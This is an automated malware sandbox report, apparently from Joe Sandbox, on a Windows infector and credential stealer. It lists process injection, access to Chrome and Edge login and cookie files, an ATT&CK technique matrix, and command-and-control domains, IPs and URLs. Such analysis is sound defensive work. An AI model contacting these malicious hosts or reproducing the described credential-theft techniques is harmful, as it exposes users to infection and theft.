                Source: C:\Users\user\Desktop\uG3I84bQEr.exeCode function: 0_2_00403B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00403B3A
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeCode function: 0_2_004048D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_004048D7
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeCode function: 0_2_00464C53 mouse_event,0_2_00464C53
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\uG3I84bQEr.exe"Jump to behavior
                Source: C:\Program Files (x86)\AiTmROKqKQWqeMjIvbtQffgXEerYwmRmGoSVODMPiW\bGPwjAWMEtES.exeProcess created: C:\Windows\SysWOW64\bitsadmin.exe "C:\Windows\SysWOW64\bitsadmin.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeCode function: 0_2_00457CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00457CAF
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeCode function: 0_2_0045874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_0045874B
                Source: uG3I84bQEr.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                Source: bGPwjAWMEtES.exe, 00000006.00000002.3472415844.0000000001681000.00000002.00000001.00040000.00000000.sdmp, bGPwjAWMEtES.exe, 00000006.00000000.2420949643.0000000001680000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: IProgram Manager
                Source: uG3I84bQEr.exe, bGPwjAWMEtES.exe, 00000006.00000002.3472415844.0000000001681000.00000002.00000001.00040000.00000000.sdmp, bGPwjAWMEtES.exe, 00000006.00000000.2420949643.0000000001680000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: bGPwjAWMEtES.exe, 00000006.00000002.3472415844.0000000001681000.00000002.00000001.00040000.00000000.sdmp, bGPwjAWMEtES.exe, 00000006.00000000.2420949643.0000000001680000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: bGPwjAWMEtES.exe, 00000006.00000002.3472415844.0000000001681000.00000002.00000001.00040000.00000000.sdmp, bGPwjAWMEtES.exe, 00000006.00000000.2420949643.0000000001680000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeCode function: 0_2_0042862B cpuid 0_2_0042862B
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeCode function: 0_2_00434E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00434E87
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeCode function: 0_2_00441E06 GetUserNameW,0_2_00441E06
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeCode function: 0_2_00433F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_00433F3A
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeCode function: 0_2_004049A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_004049A0

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: 3.2.svchost.exe.500000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.svchost.exe.500000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000007.00000002.3471913898.0000000003000000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.2505596273.0000000000500000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.2505839285.00000000029A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3472823887.0000000005F10000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.2506486835.0000000006550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3471962975.0000000003050000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3470661135.0000000002920000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\SysWOW64\bitsadmin.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
                Source: uG3I84bQEr.exeBinary or memory string: WIN_81
                Source: uG3I84bQEr.exeBinary or memory string: WIN_XP
                Source: uG3I84bQEr.exeBinary or memory string: WIN_XPe
                Source: uG3I84bQEr.exeBinary or memory string: WIN_VISTA
                Source: uG3I84bQEr.exeBinary or memory string: WIN_7
                Source: uG3I84bQEr.exeBinary or memory string: WIN_8
                Source: uG3I84bQEr.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: 3.2.svchost.exe.500000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.svchost.exe.500000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000007.00000002.3471913898.0000000003000000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.2505596273.0000000000500000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.2505839285.00000000029A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3472823887.0000000005F10000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.2506486835.0000000006550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3471962975.0000000003050000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3470661135.0000000002920000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeCode function: 0_2_00476283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_00476283
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeCode function: 0_2_00476747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00476747
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire Infrastructure2
                Valid Accounts
                2
                Native API
                1
                DLL Side-Loading
                1
                Exploitation for Privilege Escalation
                1
                Disable or Modify Tools
                1
                OS Credential Dumping
                2
                System Time Discovery
                1
                Taint Shared Content
                1
                Archive Collected Data
                4
                Ingress Tool Transfer
                Exfiltration Over Other Network Medium1
                System Shutdown/Reboot
                CredentialsDomainsDefault Accounts2
                Service Execution
                2
                Valid Accounts
                1
                Abuse Elevation Control Mechanism
                1
                Deobfuscate/Decode Files or Information
                21
                Input Capture
                1
                Account Discovery
                Remote Desktop Protocol1
                Data from Local System
                1
                Encrypted Channel
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAt1
                Windows Service
                1
                DLL Side-Loading
                1
                Abuse Elevation Control Mechanism
                Security Account Manager2
                File and Directory Discovery
                SMB/Windows Admin Shares1
                Email Collection
                4
                Non-Application Layer Protocol
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
                Valid Accounts
                3
                Obfuscated Files or Information
                NTDS126
                System Information Discovery
                Distributed Component Object Model21
                Input Capture
                4
                Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
                Access Token Manipulation
                1
                Software Packing
                LSA Secrets151
                Security Software Discovery
                SSH3
                Clipboard Data
                Fallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts1
                Windows Service
                1
                Timestomp
                Cached Domain Credentials2
                Virtualization/Sandbox Evasion
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items312
                Process Injection
                1
                DLL Side-Loading
                DCSync3
                Process Discovery
                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job111
                Masquerading
                Proc Filesystem11
                Application Window Discovery
                Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt2
                Valid Accounts
                /etc/passwd and /etc/shadow1
                System Owner/User Discovery
                Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron2
                Virtualization/Sandbox Evasion
                Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd21
                Access Token Manipulation
                Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task312
                Process Injection
                KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1588344 Sample: uG3I84bQEr.exe Startdate: 11/01/2025 Architecture: WINDOWS Score: 100 37 www.soainsaat.xyz 2->37 39 www.xcvbj.asia 2->39 41 7 other IPs or domains 2->41 53 Suricata IDS alerts for network traffic 2->53 55 Antivirus detection for URL or domain 2->55 57 Antivirus detection for dropped file 2->57 61 8 other signatures 2->61 10 uG3I84bQEr.exe 5 2->10         started        15 alg.exe 2->15         started        17 armsvc.exe 2->17         started        signatures3 59 Performs DNS queries to domains with low reputation 37->59 process4 dnsIp5 49 ssbzmoy.biz 18.141.10.107, 49738, 80 AMAZON-02US United States 10->49 51 pywolwnvd.biz 54.244.188.177, 49731, 80 AMAZON-02US United States 10->51 31 C:\Windows\System32\alg.exe, PE32+ 10->31 dropped 33 C:\Windows\System32\AppVClient.exe, PE32+ 10->33 dropped 35 C:\Program Files (x86)\...\armsvc.exe, PE32 10->35 dropped 75 Binary is likely a compiled AutoIt script file 10->75 77 Writes to foreign memory regions 10->77 79 Maps a DLL or memory area into another process 10->79 85 3 other signatures 10->85 19 svchost.exe 10->19         started        81 Antivirus detection for dropped file 15->81 83 Machine Learning detection for dropped file 15->83 file6 signatures7 process8 signatures9 63 Maps a DLL or memory area into another process 19->63 22 bGPwjAWMEtES.exe 19->22 injected process10 dnsIp11 43 www.xcvbj.asia 149.88.81.190, 49990, 49991, 49992 SAIC-ASUS United States 22->43 45 www.nb-shenshi.buzz 161.97.142.144, 49967, 80 CONTABODE United States 22->45 47 2 other IPs or domains 22->47 65 Found direct / indirect Syscall (likely to bypass EDR) 22->65 26 bitsadmin.exe 13 22->26         started        signatures12 process13 signatures14 67 Tries to steal Mail credentials (via file / registry access) 26->67 69 Tries to harvest and steal browser information (history, passwords, etc) 26->69 71 Modifies the context of a thread in another process (thread injection) 26->71 73 2 other signatures 26->73 29 firefox.exe 26->29         started        process15

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                uG3I84bQEr.exe82%ReversingLabsWin32.Virus.Expiro
                uG3I84bQEr.exe81%VirustotalBrowse
                uG3I84bQEr.exe100%AviraW32/Infector.Gen
                uG3I84bQEr.exe100%Joe Sandbox ML
                SourceDetectionScannerLabelLink
                C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe100%AviraW32/Infector.Gen
                C:\Windows\System32\AppVClient.exe100%AviraW32/Infector.Gen
                C:\Windows\System32\alg.exe100%AviraW32/Infector.Gen
                C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe100%Joe Sandbox ML
                C:\Windows\System32\AppVClient.exe100%Joe Sandbox ML
                C:\Windows\System32\alg.exe100%Joe Sandbox ML
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                http://www.soainsaat.xyz0%Avira URL Cloudsafe
                http://server/get.asp0%Avira URL Cloudsafe
                http://www.soainsaat.xyz/rum2/100%Avira URL Cloudmalware
                http://www.laohub10.net/sgdd/0%Avira URL Cloudsafe
                http://18.141.10.107/(0%Avira URL Cloudsafe
                http://www.laohub10.net/sgdd/?9V7X=n1rc2pzYlnLUqZJmqzqSU8jwiNDNG2kr4Asv9klFc/49ZVn3If5xE9SNYfvTzAEQBq2X9buCd1WXrrlhdqeZRjDpBSVBr7xCoBK9DVxTDHFUGGR5RoH3IsxqdsiGMvHVT1pqSHQ=&WldT=UFzdV2kX30%Avira URL Cloudsafe
                http://www.nb-shenshi.buzz/xxr1/?WldT=UFzdV2kX3&9V7X=CTzPrZCB9Fii6KjQQmIrKOWCR/YsuH5VDwI2wO/wDVbWtCCaNtYNYtUcS5/lXeW122DeEWPiybvqXTX+KsM65kw/IL4BQaU5/Yfn2j/HOFiURDDVRtX+aUGy8uGla3Axtt/A0yI=0%Avira URL Cloudsafe
                http://18.141.10.107/dwlowhbefckeydsA0%Avira URL Cloudsafe
                http://18.141.10.107:80/dwlowhbefckeyd0%Avira URL Cloudsafe
                http://www.xcvbj.asia/rq1s/0%Avira URL Cloudsafe
                http://18.141.10.107/dwlowhbefckeydx0%Avira URL Cloudsafe
                http://54.244.188.177/100%Avira URL Cloudmalware
                http://18.141.10.107/dwlowhbefckeyd0%Avira URL Cloudsafe
                NameIPActiveMaliciousAntivirus DetectionReputation
                s-part-0017.t-0009.t-msedge.net
                13.107.246.45
                truefalse
                  high
                  ssbzmoy.biz
                  18.141.10.107
                  truefalse
                    high
                    pywolwnvd.biz
                    54.244.188.177
                    truefalse
                      high
                      r0lqcud7.nbnnn.xyz
                      23.225.159.42
                      truefalse
                        high
                        www.xcvbj.asia
                        149.88.81.190
                        truefalse
                          high
                          www.nb-shenshi.buzz
                          161.97.142.144
                          truefalse
                            high
                            natroredirect.natrocdn.com
                            85.159.66.93
                            truefalse
                              high
                              www.laohub10.net
                              unknown
                              unknownfalse
                                high
                                www.soainsaat.xyz
                                unknown
                                unknownfalse
                                  high
                                  NameMaliciousAntivirus DetectionReputation
                                  http://www.soainsaat.xyz/rum2/true
                                  • Avira URL Cloud: malware
                                  unknown
                                  http://pywolwnvd.biz/exqctojotladvuafalse
                                    high
                                    http://www.laohub10.net/sgdd/true
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.nb-shenshi.buzz/xxr1/?WldT=UFzdV2kX3&9V7X=CTzPrZCB9Fii6KjQQmIrKOWCR/YsuH5VDwI2wO/wDVbWtCCaNtYNYtUcS5/lXeW122DeEWPiybvqXTX+KsM65kw/IL4BQaU5/Yfn2j/HOFiURDDVRtX+aUGy8uGla3Axtt/A0yI=true
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.laohub10.net/sgdd/?9V7X=n1rc2pzYlnLUqZJmqzqSU8jwiNDNG2kr4Asv9klFc/49ZVn3If5xE9SNYfvTzAEQBq2X9buCd1WXrrlhdqeZRjDpBSVBr7xCoBK9DVxTDHFUGGR5RoH3IsxqdsiGMvHVT1pqSHQ=&WldT=UFzdV2kX3true
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.xcvbj.asia/rq1s/true
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://ssbzmoy.biz/dwlowhbefckeydfalse
                                      high
                                      NameSourceMaliciousAntivirus DetectionReputation
                                      https://duckduckgo.com/chrome_newtabbitsadmin.exe, 00000007.00000002.3474681876.0000000007AC8000.00000004.00000020.00020000.00000000.sdmpfalse
                                        high
                                        https://duckduckgo.com/ac/?q=bitsadmin.exe, 00000007.00000002.3474681876.0000000007AC8000.00000004.00000020.00020000.00000000.sdmpfalse
                                          high
                                          http://www.soainsaat.xyzbGPwjAWMEtES.exe, 00000006.00000002.3480937676.000000000950A000.00000040.80000000.00040000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://server/get.aspsvchost.exe, 00000003.00000003.2473240347.0000000002A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.2473112981.0000000002A1A000.00000004.00000020.00020000.00000000.sdmp, bGPwjAWMEtES.exe, 00000006.00000003.2585902954.000000000120F000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://pywolwnvd.biz/uG3I84bQEr.exe, 00000000.00000002.2247618432.0000000000D48000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=bitsadmin.exe, 00000007.00000002.3474681876.0000000007AC8000.00000004.00000020.00020000.00000000.sdmpfalse
                                              high
                                              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=bitsadmin.exe, 00000007.00000002.3474681876.0000000007AC8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                high
                                                https://www.ecosia.org/newtab/bitsadmin.exe, 00000007.00000002.3474681876.0000000007AC8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  high
                                                  http://18.141.10.107/uG3I84bQEr.exe, 00000000.00000002.2247618432.0000000000DAC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    high
                                                    https://ac.ecosia.org/autocomplete?q=bitsadmin.exe, 00000007.00000002.3474681876.0000000007AC8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      high
                                                      http://18.141.10.107/(uG3I84bQEr.exe, 00000000.00000002.2247618432.0000000000DAC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://18.141.10.107/dwlowhbefckeydsAuG3I84bQEr.exe, 00000000.00000002.2247919314.0000000000E33000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchbitsadmin.exe, 00000007.00000002.3474681876.0000000007AC8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        high
                                                        http://18.141.10.107:80/dwlowhbefckeyduG3I84bQEr.exe, 00000000.00000002.2247618432.0000000000DAC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://18.141.10.107/dwlowhbefckeydxuG3I84bQEr.exe, 00000000.00000002.2247618432.0000000000D48000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=bitsadmin.exe, 00000007.00000002.3474681876.0000000007AC8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          high
                                                          http://54.244.188.177/uG3I84bQEr.exe, 00000000.00000002.2247919314.0000000000E33000.00000004.00000020.00020000.00000000.sdmp, uG3I84bQEr.exe, 00000000.00000002.2247618432.0000000000DAC000.00000004.00000020.00020000.00000000.sdmp, uG3I84bQEr.exe, 00000000.00000002.2247618432.0000000000D48000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: malware
                                                          unknown
                                                          http://18.141.10.107/dwlowhbefckeyduG3I84bQEr.exe, 00000000.00000002.2247919314.0000000000E33000.00000004.00000020.00020000.00000000.sdmp, uG3I84bQEr.exe, 00000000.00000002.2247618432.0000000000D48000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          • No. of IPs < 25%
                                                          • 25% < No. of IPs < 50%
                                                          • 50% < No. of IPs < 75%
                                                          • 75% < No. of IPs
                                                          IPDomainCountryFlagASNASN NameMalicious
                                                          149.88.81.190
                                                          www.xcvbj.asiaUnited States
                                                          188SAIC-ASUSfalse
                                                          161.97.142.144
                                                          www.nb-shenshi.buzzUnited States
                                                          51167CONTABODEfalse
                                                          23.225.159.42
                                                          r0lqcud7.nbnnn.xyzUnited States
                                                          40065CNSERVERSUSfalse
                                                          54.244.188.177
                                                          pywolwnvd.bizUnited States
                                                          16509AMAZON-02USfalse
                                                          18.141.10.107
                                                          ssbzmoy.bizUnited States
                                                          16509AMAZON-02USfalse
                                                          85.159.66.93
                                                          natroredirect.natrocdn.comTurkey
                                                          34619CIZGITRfalse
                                                          Joe Sandbox version:42.0.0 Malachite
                                                          Analysis ID:1588344
                                                          Start date and time:2025-01-11 00:59:43 +01:00
                                                          Joe Sandbox product:CloudBasic
                                                          Overall analysis duration:0h 8m 27s
                                                          Hypervisor based Inspection enabled:false
                                                          Report type:full
                                                          Cookbook file name:default.jbs
                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                          Number of analysed new started processes analysed:10
                                                          Number of new started drivers analysed:0
                                                          Number of existing processes analysed:0
                                                          Number of existing drivers analysed:0
                                                          Number of injected processes analysed:1
                                                          Technologies:
                                                          • HCA enabled
                                                          • EGA enabled
                                                          • AMSI enabled
                                                          Analysis Mode:default
                                                          Analysis stop reason:Timeout
                                                          Sample name:uG3I84bQEr.exe
                                                          renamed because original name is a hash value
                                                          Original Sample Name:fced488bab6f8793e1ca19858cf208ebc5c2b0ee18087489a2a35eb7fee803af.exe
                                                          Detection:MAL
                                                          Classification:mal100.spre.troj.spyw.evad.winEXE@9/9@6/6
                                                          EGA Information:
                                                          • Successful, ratio: 100%
                                                          HCA Information:
                                                          • Successful, ratio: 78%
                                                          • Number of executed functions: 76
                                                          • Number of non-executed functions: 241
                                                          Cookbook Comments:
                                                          • Found application associated with file extension: .exe
                                                          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                          • Excluded IPs from analysis (whitelisted): 13.107.246.45, 20.12.23.50
                                                          • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, ctldl.windowsupdate.com, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                                                          • Report creation exceeded maximum time and may have missing disassembly code information.
                                                          • Report size exceeded maximum capacity and may have missing disassembly code.
                                                          TimeTypeDescription
                                                          19:00:45API Interceptor1x Sleep call for process: uG3I84bQEr.exe modified
                                                          19:01:48API Interceptor2035939x Sleep call for process: bitsadmin.exe modified
                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          149.88.81.190PO 4110007694.exeGet hashmaliciousFormBookBrowse
                                                          • www.xcvbj.asia/rq1s/
                                                          Latest advice payment.exeGet hashmaliciousFormBookBrowse
                                                          • www.xcvbj.asia/rq1s/
                                                          Document_084462.scr.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                          • www.xcvbj.asia/hkgx/?2O=wgVoJ8uM9T0/Zez11uxn+VRLTSqblAamGOKD8PxxFFLfP5o8U05sZY2pknTlSn+/tcq1eo8k+yVAgRwnrxxUqTNM4+b8NMxfCgVpsHr1kyIADa2UTEjwUtE=&ChhG6=J-xs
                                                          Proforma invoice - Arancia NZ.exeGet hashmaliciousFormBookBrowse
                                                          • www.xcvbj.asia/hkgx/
                                                          OUTSTANDING BALANCE PAYMENT.exeGet hashmaliciousFormBookBrowse
                                                          • www.xcvbj.asia/rq1s/
                                                          OUTSTANDING BALANCE PAYMENT.exeGet hashmaliciousFormBookBrowse
                                                          • www.xcvbj.asia/rq1s/
                                                          PAYROLL LIST.exeGet hashmaliciousFormBookBrowse
                                                          • www.xcvbj.asia/hkgx/
                                                          purchase Order.exeGet hashmaliciousFormBookBrowse
                                                          • www.xcvbj.asia/rq1s/
                                                          RFQ 3100185 MAHAD.exeGet hashmaliciousFormBookBrowse
                                                          • www.xcvbj.asia/rq1s/
                                                          161.97.142.144gKvjKMCUfq.exeGet hashmaliciousFormBookBrowse
                                                          • www.nb-shenshi.buzz/mz7t/
                                                          SC_TR11670000_pdf.exeGet hashmaliciousFormBookBrowse
                                                          • www.030002059.xyz/er88/
                                                          RFQ3978 39793980.pdf.exeGet hashmaliciousFormBookBrowse
                                                          • www.030002350.xyz/1a7n/
                                                          SHIPPING DOCUMENTS_PDF.exeGet hashmaliciousFormBookBrowse
                                                          • www.070001813.xyz/gn0y/
                                                          PO2412010.exeGet hashmaliciousFormBookBrowse
                                                          • www.070002018.xyz/6m2n/
                                                          New Purchase Order.exeGet hashmaliciousFormBookBrowse
                                                          • www.070001325.xyz/gebt/?INvlf=vv4Z5oAEVW8Fnw5+v3rC78A1apnlABoa7eW6m5kMXrJjwDKHwLvNIdd6hCLbwWC7cjqqbjXxYb26MUHQV2edmwlqePdZlnBGcJVL9hTasAQSXzj69w==&afo=JnyH0Z2
                                                          Quotation Validity.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                          • www.070002018.xyz/6m2n/
                                                          Order MEI PO IM202411484.exeGet hashmaliciousFormBookBrowse
                                                          • www.030002613.xyz/xd9h/
                                                          Documents.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                          • www.030002449.xyz/cfqm/
                                                          PAYMENT_TO_NFTC_(CUB)_26-11-24.docGet hashmaliciousDarkTortilla, FormBookBrowse
                                                          • www.070001955.xyz/7zj0/
                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          s-part-0017.t-0009.t-msedge.net12621132703258916868.jsGet hashmaliciousStrela DownloaderBrowse
                                                          • 13.107.246.45
                                                          Cpfkf79Rzk.exeGet hashmaliciousGuLoaderBrowse
                                                          • 13.107.246.45
                                                          https://noiclethomas.wixsite.com/riceGet hashmaliciousUnknownBrowse
                                                          • 13.107.246.45
                                                          TjoY7n65om.exeGet hashmaliciousSnake KeyloggerBrowse
